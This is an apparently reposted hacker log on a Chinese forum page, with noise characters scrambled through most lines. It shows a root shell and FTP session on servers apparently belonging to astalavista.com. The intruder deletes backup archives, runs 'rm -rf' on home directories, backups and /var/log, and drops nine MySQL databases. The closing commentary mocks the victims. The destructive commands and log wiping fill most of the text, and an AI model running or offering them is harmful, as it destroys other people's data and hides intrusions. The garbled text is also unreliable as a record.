& @2 N, o0 G) k% rdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
3 M* `7 e" O1 q5 _2 W! i* ]226 Transfer complete.9 l( t5 @, j5 T- r
ftp> cd astalavista.com
; F) R. l$ }1 k2 f" x250 CWD command successful.9 b, S! t/ g4 I
ftp> ls -la
5 A' z6 A' M5 h+ B( [ ]/ M- A, M227 Entering Passive Mode (212,254,194,163,2,189)0 g1 g. l; E! }$ H: B
150 Opening BINARY mode data connection for ‘file list’.4 G* k7 L# J- P- a( u; ]
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar; B5 Q* o! F/ ?; h2 l
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2. U& R( q1 U; H2 G# T4 M$ K
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz23 j8 s, b3 S. Q& K% \
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar5 D$ F9 ^; z7 z' ~3 i
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar- J1 J* Q9 Z3 I$ H5 o" r
[snip]7 F0 h" Z! F! N7 v; e& p9 N' c! e% o
226 Transfer complete.+ p; R0 Y: _$ C6 }9 p; [6 K
ftp> mdelete *
; `; C# R" g3 h6 X7 `ftp> ls -la2 A2 A" }, q8 F' K
227 Entering Passive Mode (212,254,194,163,2,193); r! _# a9 v) x
150 Opening BINARY mode data connection for ‘file list’." g5 y' H2 g# {9 o$ P( H
226 Transfer complete.
4 S4 I G/ W9 F7 O' S8 H) }( }2 C. N8 nftp>& u6 l) e8 F8 P, G* C0 v; E- Q9 l
8 p$ }! |4 e$ C& l) @9 u& ~
sh-3.2# cd /home
7 c$ ^# Y# ^9 u5 k) [8 P' esh-3.2# ls -la% G5 F4 V6 k, Y7 t; G1 P" b- s: p
total 120
4 r* `! O- |2 A& q4 ?, Pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
7 G5 r" V( P5 W- Q+ C. l) e! l- zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
+ z) J6 h! i. n( _- w3 Ndrwx–x–x 9 admin admin 4096 Nov 28 2007 admin% f, r" a. W* f( R; E5 s
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
0 `7 e- n1 z& {; \9 }-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
8 r7 [' m2 P( s# Z" odrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet E0 @8 z" _+ n- G
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
8 [& i# s% d" ?# M3 _drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141617 N4 E2 L+ D4 T# M$ _; m) V, U
drwx–x–x 10 com com 4096 Apr 28 12:40 com
0 X3 u7 ~5 `" v6 K5 k- w" gdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
+ i; A6 X0 v3 Wdrwx—— 3 jon jon 4096 Sep 21 2007 jon
' c% p2 }8 o2 h7 e# |' i- A6 Qdrwx—— 2 root root 16384 Sep 11 2007 lost+found
. U: x. ]* p; p2 V P7 w1 A% Ldrwxr-xr-x 2 root root 4096 Sep 14 2007 my& Z7 L9 q3 O+ f
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
: Y* H+ N5 k6 B4 ?9 kdrwx—— 2 jon jon 4096 Sep 15 2007 test- s+ q% H4 ~' M
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp& d3 W( _/ Y. n5 M! v8 z r; d5 z
' L1 `% J9 e5 T+ d! \+ O# O
sh-3.2# rm -rf backup/
& ]- ]1 x# T3 b' q/ `sh-3.2# rm -rf backup.14161/
$ P0 z4 M9 b: L. ish-3.2# rm -rf ftp/
5 ~8 p6 R7 t' k: o6 ?' A, T8 Z# Wsh-3.2# rm -rf jon/
& c5 N, B8 v7 vsh-3.2# rm -rf my/' h: K/ b2 Q- V
sh-3.2# rm -rf mysqldata/
" T1 h9 O* b- a9 R3 P! t" ksh-3.2# rm -rf test/8 A* \3 r- [" T9 k! _
sh-3.2# rm -rf tmp/7 R4 s6 l7 J" Z6 }' A0 d6 k
sh-3.2# cd ~0 Q4 C7 F. `2 o& b% ^# n
sh-3.2# rm -rf *) [, J/ q2 M$ j2 Y; x0 V" \" u( p; x
sh-3.2# rm -rf /var/log/1 Y0 S6 S5 }3 @* h+ _' q9 n- i( T
rm: cannot remove directory `/var/log//proftpd’: Directory not empty: k. v0 K$ R' v* ~ A- \
sh-3.2# rm -rf /home/*
3 i/ C& z% R3 f3 I* H4 j$ Ysh-3.2# mysql/ A1 Q0 {$ D1 |2 q6 @8 q7 W
Welcome to the MySQL monitor. Commands end with ; or \g., \$ Z5 x, _$ y, X0 I: c7 {: [
Your MySQL connection id is 4071563 [7 V9 ^! y2 }) q1 E
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
) o3 U" r: x: x5 c9 x8 x+ h1 d, r- k1 r" | P; ] k9 g9 o
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
: o( U. h8 ^( j; [
1 ], G% S. ~$ c W$ }: @8 Q$ N" vmysql> show databases;, X( R% b. F, b, v4 X
+———————–+
: J% e1 ~9 _; E" z @1 g4 m| Database |+ S: f* E4 }+ O
+———————–+# @; O9 b+ I( ]: a
| information_schema |
" I& j. n' N- L' h| astanet_ads |
- G3 _, d2 G/ ?% v| astanet_mailing_lists |8 ]1 X! R% ~2 {/ P
| astanet_mediawiki |6 Y: V U: z3 @5 _6 i; e5 P/ s# h5 t3 ]# j
| astanet_membersystem |
7 ?. A3 I& _* R X/ N4 W# O/ b' m| com_contrexx |
0 H- ?6 c/ P% g/ x& @% i| com_contrexx2 |
0 w$ m) k6 O9 W% o, B9 r| com_contrexx2_live |
5 M: o% M, s- w( w| da_roundcube |
1 d7 T& B- M, {& r| dolphin |9 b) `# B4 w z# c
| ideapool |
7 L/ g* ]& Z3 j| mysql |( u& q" X$ ^. o! F& Q+ e8 }
| test |" `, k- S7 k: ]0 @( [( a. E* Z" _
| yourmaster |' |( B1 T, q; `) E$ N0 Z
+———————–+
4 V# v9 Q3 X: Y0 i14 rows in set (0.03 sec)
) p3 o. D1 R3 V0 O q) d. c v& z
mysql> drop database astanet_membersystem;' \/ v- N) j0 H) b+ Q
droQuery OK, 46 rows affected (0.81 sec)
+ |. }! R' t: Y9 v3 S: b3 `' Y m# B4 A: j) m" t6 B9 T% _6 R
mysql> drop database com_contrexx;0 @6 A0 U- Y6 ~6 D9 ]; x' [! M
Query OK, 211 rows affected (2.72 sec)
# X2 ^2 Q2 v9 J8 O; c* i1 x, Z
mysql> drop database com_contrexx2;9 w9 [7 a1 `/ E3 d, l7 v; ]
Query OK, 237 rows affected (2.23 sec)
: k# [! y0 X: T, P+ T9 r* H, }# J0 e6 K3 P3 \
mysql> drop database com_contrexx2_live;% s1 D3 T" b: K3 m5 t6 Z/ J7 y
Query OK, 227 rows affected (7.63 sec)
6 o4 H5 ?1 r1 F6 e0 f. J. \2 y3 T( I: v7 _% R! ]7 c2 j. R
mysql> drop database ideapool;
) y4 g5 E2 I+ y3 J+ t( OQuery OK, 69 rows affected (0.19 sec)
+ t& m/ m" [% G
: F( Z3 Y' {2 q/ U! `! x( _mysql> drop database yourmaster;0 ]7 a0 n$ }5 A3 k' ]% c2 D0 h
Query OK, 158 rows affected (0.55 sec)
* w8 X; _3 p( n% J, o1 i6 O/ m) P: X5 C
mysql> drop database astanet_ads;$ N7 z& Q7 b( B
Query OK, 9 rows affected (0.11 sec)
0 z) M; k9 M4 w2 _! D' V
; [7 [0 }5 k4 b* Y# d* qmysql> drop database astanet_mailing_lists;4 c- x" \8 l! m* w! @# { R1 R
Query OK, 24 rows affected (1.47 sec)
0 W& j' Z& G: w4 M6 A
6 @1 L' M! Z$ k omysql> drop database astanet_mediawiki;
( g4 P! `3 m( xQuery OK, 31 rows affected (0.51 sec)
! g. b& V+ O& f0 i/ u) _7 u, U' V$ n4 `
mysql> show databases;
0 s, q- D# D7 V0 k% C. H( X! _+——————–+
& p4 _! B6 b* [2 l( ~| Database |+ b3 D" v7 D9 n8 n+ |
+——————–+. x7 z' {7 X1 T% S
| information_schema |6 ]4 |" m7 D+ g8 i
| da_roundcube |* F, M6 |2 b* {- N% a2 Z9 t( G/ I( m
| dolphin |
9 V' u c7 T# y7 {| mysql |# S' F! F0 |8 I, b$ f. f
| test |
' `, s( h7 r! r9 Y+——————–+% S# u0 \! u! A$ Y
5 rows in set (0.00 sec)% v- r. ?+ G s( c7 P
2 `. h# b% j+ N; {4 B' L
What a journey! We’re not sure exactly why the “Terminator” had any influence on
7 ^% T4 v, \5 S! n! T0 Itheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
& i. n& U6 d& A! d0 g- ~wrong to say this pack of morons *wont be back*.
1 `, W- B* j7 G$ m( k |
发表于 2012-11-6 21:07:34
收藏
支持
反对